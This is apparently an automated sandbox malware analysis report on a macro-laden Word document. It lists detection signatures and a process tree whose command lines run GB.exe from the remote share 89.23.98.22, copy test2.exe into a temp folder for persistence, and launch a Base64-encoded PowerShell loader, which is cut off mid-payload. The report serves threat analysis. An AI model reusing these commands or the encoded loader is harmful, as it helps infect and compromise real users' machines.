Edit tour
Windows
Analysis Report
42#U0430.doc
Overview
General Information
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Document Viewer accesses SMB path (likely to steal NTLM hashes or to download payload)
Document contains an embedded VBA macro which may execute processes
Document contains an embedded VBA macro with suspicious strings
Document exploit detected (process start blacklist hit)
Installs new ROOT certificates
Machine Learning detection for sample
Opens network shares
Powershell uses Background Intelligent Transfer Service (BITS)
Suspicious powershell command line found
Uses cmd line tools excessively to alter registry or file data
Very long command line found
AV process strings found (often used to terminate AV products)
Binary contains a suspicious time stamp
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Document misses a certain OLE stream usually present in this Microsoft Office document type
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Stores large binary data to the registry
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w7x64
- WINWORD.EXE (PID: 3204 cmdline:
"C:\Progra m Files\Mi crosoft Of fice\Offic e14\WINWOR D.EXE" /Au tomation - Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5) - explorer.exe (PID: 3292 cmdline:
explorer.e xe "\\89.2 3.98.22\LN \" MD5: 38AE1B3C38FAEF56FE4907922F0385BA) - GB.exe (PID: 3444 cmdline:
\\89.23.98 .22\LN\GB. exe MD5: C3E7CFA2E076C3CA421DDC00496C71B5) - cmd.exe (PID: 3484 cmdline:
cmd.exe /c res.bat & & test2.ex e MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41) - cmd.exe (PID: 3524 cmdline:
C:\Windows \system32\ cmd.exe /S /D /c" ec ho f " MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41) - xcopy.exe (PID: 3532 cmdline:
xcopy /s t est2.exe " C:\Users\u ser\AppDat a\Local\Te mp\persist ent2\test2 .exe" MD5: 20CF8728C55A8743AAC86FB8D30EA898) - powershell.exe (PID: 3560 cmdline:
powershell -Command "[System.T ext.Encodi ng]::Unico de.GetStri ng([System .Convert]: :FromBase6 4String('Z gB1AG4AYwB 0AGkAbwBuA CAARwBlAHQ ALQBEAGUAY wBvAG0AcAB yAGUAcwBzA GUAZABCAHk AdABlAEEAc gByAGEAeQA gAHsACgAKA CAAIAAgACA AIAAgACAAI ABbAEMAbQB kAGwAZQB0A EIAaQBuAGQ AaQBuAGcAK AApAF0ACgA gACAAIAAgA FAAYQByAGE AbQAgACgAC gAgACAAIAA gACAAIAAgA CAAIAAgACA AIAAgACAAI AAgAFsAUAB hAHIAYQBtA GUAdABlAHI AKABNAGEAb gBkAGEAdAB vAHIAeQAsA FYAYQBsAHU AZQBGAHIAb wBtAFAAaQB wAGUAbABpA G4AZQAsAFY AYQBsAHUAZ QBGAHIAbwB tAFAAaQBwA GUAbABpAG4 AZQBCAHkAU AByAG8AcAB lAHIAdAB5A E4AYQBtAGU AKQBdAAoAI AAgACAAIAA gACAAIAAgA FsAYgB5AHQ AZQBbAF0AX QAgACQAYgB 5AHQAZQBBA HIAcgBhAHk AIAA9ACAAJ AAoAFQAaAB yAG8AdwAoA CIALQBiAHk AdABlAEEAc gByAGEAeQA gAGkAcwAgA HIAZQBxAHU AaQByAGUAZ AAiACkAKQA KACAAIAAgA CAAKQAKACA AIAAgACAAI AAgACAAIAB QAHIAbwBjA GUAcwBzACA AewAKACAAI AAgACAAIAA gACAAIAAgA CAAIAAgAFc AcgBpAHQAZ QAtAFYAZQB yAGIAbwBzA GUAIAAiAEc AZQB0AC0AR ABlAGMAbwB tAHAAcgBlA HMAcwBlAGQ AQgB5AHQAZ QBBAHIAcgB hAHkAIgAKA CAAIAAgACA AIAAgACAAI AAkAGkAbgB wAHUAdAAgA D0AIABOAGU AdwAtAE8AY gBqAGUAYwB 0ACAAUwB5A HMAdABlAG0 ALgBJAE8AL gBNAGUAbQB vAHIAeQBTA HQAcgBlAGE AbQAoACAAL AAgACQAYgB 5AHQAZQBBA HIAcgBhAHk AIAApAAoAI AAgACAAIAA gACAAIAAgA CAAIAAgACA AJABvAHUAd ABwAHUAdAA gAD0AIABOA GUAdwAtAE8 AYgBqAGUAY wB0ACAAUwB 5AHMAdABlA G0ALgBJAE8 ALgBNAGUAb QBvAHIAeQB TAHQAcgBlA GEAbQAKACA AIAAgACAAI AAgACAAIAA kAGcAegBpA HAAUwB0AHI AZQBhAG0AI AA9ACAATgB lAHcALQBPA GIAagBlAGM AdAAgAFMAe QBzAHQAZQB tAC4ASQBPA C4AQwBvAG0 AcAByAGUAc wBzAGkAbwB uAC4ARwB6A GkAcABTAHQ AcgBlAGEAb QAgACQAaQB uAHAAdQB0A CwAIAAoAFs ASQBPAC4AQ wBvAG0AcAB yAGUAcwBzA GkAbwBuAC4 AQwBvAG0Ac AByAGUAcwB zAGkAbwBuA E0AbwBkAGU AXQA6ADoAR ABlAGMAbwB tAHAAcgBlA HMAcwApAAo AIAAgACAAI AAgACAAIAA gACAAIAAgA CAAJABnAHo AaQBwAFMAd AByAGUAYQB tAC4AQwBvA HAAeQBUAG8 AKAAgACQAb wB1AHQAcAB 1AHQAIAApA AoAIAAgACA AIAAgACAAI AAgACQAZwB 6AGkAcABTA HQAcgBlAGE AbQAuAEMAb ABvAHMAZQA oACkACgAgA CAAIAAgACA AIAAgACAAI AAgACAAIAA gACAAIAAgA CQAaQBuAHA AdQB0AC4AQ wBsAG8AcwB lACgAKQAKA CAAIAAgACA AIAAgACAAI AAgACAAIAA gACAAIAAgA CAAWwBiAHk AdABlAFsAX QBdACAAJAB iAHkAdABlA E8AdQB0AEE AcgByAGEAe QAgAD0AIAA kAG8AdQB0A HAAdQB0AC4 AVABvAEEAc gByAGEAeQA oACkACgAgA CAAIAAgACA AIAAgACAAV wByAGkAdAB lAC0ATwB1A HQAcAB1AHQ AIAAkAGIAe QB0AGUATwB 1AHQAQQByA HIAYQB5AAo AIAAgACAAI AB9AAoAfQA KAAoAWwBiA HkAdABlAFs AXQBdACAAJ ABiAHkAdAB lAF8AYQByA HIAYQB5ACA APQAgADMAM QAsADEAMwA 5ACwAOAAsA DAALAAwACw AMAAsADAAL AAwACwANAA sADAALAAxA DQAOQAsADE ANAA0ACwAM QA5ADMALAA xADEANAAsA DEAMwAwACw ANAA4ACwAM gAwACwANgA 5ACwAMQAyA DcALAA0ADE ALAA5ADYAL AAxADAAOQA sADEAOQA5A CwAMQAzADM ALAAxADEAL AA1ACwAMQA 0ADYALAA5A CwAMwA1ACw AMQA3ADcAL AAyACwAMQA yADUALAA5A CwAMQAxADE